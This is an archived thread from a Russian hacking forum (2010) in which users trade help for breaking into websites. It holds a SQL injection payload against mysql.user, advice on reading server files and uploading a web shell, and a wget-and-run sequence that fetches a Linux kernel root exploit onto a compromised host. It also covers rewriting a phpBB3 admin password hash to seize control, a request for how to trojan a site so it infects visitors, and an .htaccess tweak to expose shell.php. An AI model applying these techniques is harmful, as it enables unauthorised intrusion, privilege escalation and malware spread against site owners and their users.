ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13011  
Старый 08.05.2010, 21:51
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от olishort  
Ребят, помогите залить шелл через двойной запрос.
Не могу залить т.к magic_quotes = on

?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+f rom+mysql.user--

выводится 2 и 8. file_priv = Y

Почитал https://forum.antichat.ru/showpost.php?p=663815&postcount=39... не получается

load_file() скрипта, прочитай его, глянь как запрос составляется, исходя из этих данных залей шелл через "двойной запрос"(если возможность есть такая), в противном случае, читай файлы и доставай инфу, которая поможет залить шелл(пасс от мускула и тд)



Цитата:
Сообщение от GOGA075  
А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!

посмотри таблицу с юзерами, глянь админа, и по аналогии сделай так же.
 
Ответить с цитированием

  #13012  
Старый 08.05.2010, 22:26
Аватар для karencho777
karencho777
Новичок
Регистрация: 20.01.2010
Сообщений: 4
Провел на форуме:
19629

Репутация: 0
По умолчанию

нашел уязвимость "вставление пхп кода":PHP не ограничивает набор символов в идентификаторе сессии (PHPSESSID) в обработчиках сессии, разработанных сторонними производителями, что может облегчить злоумышленникам, действующим удаленно, эксплуатацию других уязвимостей, если они внедрят PHP-код в PHPSESSID, который хранится в файле сессии. Замечание: существует мнение, что данная проблема не является уязвимостью в самом PHP, а является скорее конструктивным ограничением, которое позволяет проводить определенные атаки против обработчиков сессии, которые не учитывают данное ограничение .
как можно етим воспользоватса?
еше насканил "пеереполнение буфера":Переполнение буфера в функции snmpget в расширении snmp в PHP позволяет злоумышленникам выполнить произвольный код, используя длинное значение в третьем аргументе (object id). так же уязвимость форматной строки и повышение привилегий все ето на 80 порту сайта помогите пожалуйсто наитй експлойт или что то т.п спасибо
 
Ответить с цитированием

  #13013  
Старый 08.05.2010, 22:40
Аватар для daniel_1024
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

скажите что можно сделать ,если на сервере не включено gcc (нельзя сплойты компилировать). можно их уже в скомпилированном виде загружать?
 
Ответить с цитированием

  #13014  
Старый 08.05.2010, 22:53
Аватар для olishort
olishort
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме:
436858

Репутация: 33
По умолчанию

Цитата:
Сообщение от попугай  
load_file() скрипта, прочитай его, глянь как запрос составляется, исходя из этих данных залей шелл через "двойной запрос"(если возможность есть такая), в противном случае, читай файлы и доставай инфу, которая поможет залить шелл(пасс от мускула и тд)






посмотри таблицу с юзерами, глянь админа, и по аналогии сделай так же.
у меня легко читаются папки. но не могу прочесть .php файлы. не знаю что за бред.

p.s и дальше /usr/local/www/apache22/data/http даже папки не могу смотреть. юзаю hex

Последний раз редактировалось olishort; 08.05.2010 в 23:09..
 
Ответить с цитированием

  #13015  
Старый 08.05.2010, 23:02
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от daniel_1024  
скажите что можно сделать ,если на сервере не включено gcc (нельзя сплойты компилировать). можно их уже в скомпилированном виде загружать?
http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz

wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
 
Ответить с цитированием

  #13016  
Старый 08.05.2010, 23:57
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от olishort  
у меня легко читаются папки. но не могу прочесть .php файлы. не знаю что за бред.

p.s и дальше /usr/local/www/apache22/data/http даже папки не могу смотреть. юзаю hex

прав нет значит на файлы. Если текст запроса в случае ошибки не выводится, то проэксплуатировать "двойной запрос" будет сложно - если только подбирать варианты, и это в случае если действительно есть два и\или более запроса
 
Ответить с цитированием

  #13017  
Старый 09.05.2010, 00:17
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

подниму вопрос свой

Цитата:
Сообщение от GOGA075  
А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!
 
Ответить с цитированием

  #13018  
Старый 09.05.2010, 00:26
Аватар для Rew
Rew
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188

Репутация: 0
По умолчанию

Как можно незаметно затроянить сайт есть доступ к БД что можно там написать что бы сайт попал под потанцеально опасные для пользователя сайты в выдачи поискавика.
 
Ответить с цитированием

  #13019  
Старый 09.05.2010, 00:39
Аватар для Rew
Rew
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188

Репутация: 0
По умолчанию

Цитата:
Сообщение от GOGA075  
подниму вопрос свой
А не легче ли поправить хешь админа потом зайти под его правами и дать себе полномочия.
 
Ответить с цитированием

  #13020  
Старый 09.05.2010, 01:19
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

Есть файл .htaccess
в нем

<Files *>
Order Allow,Deny
Alow from All
</Files>

из-за него выдает ошибку 500 какуюто.

Нужно шоб файлл shell.php читался свободно!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ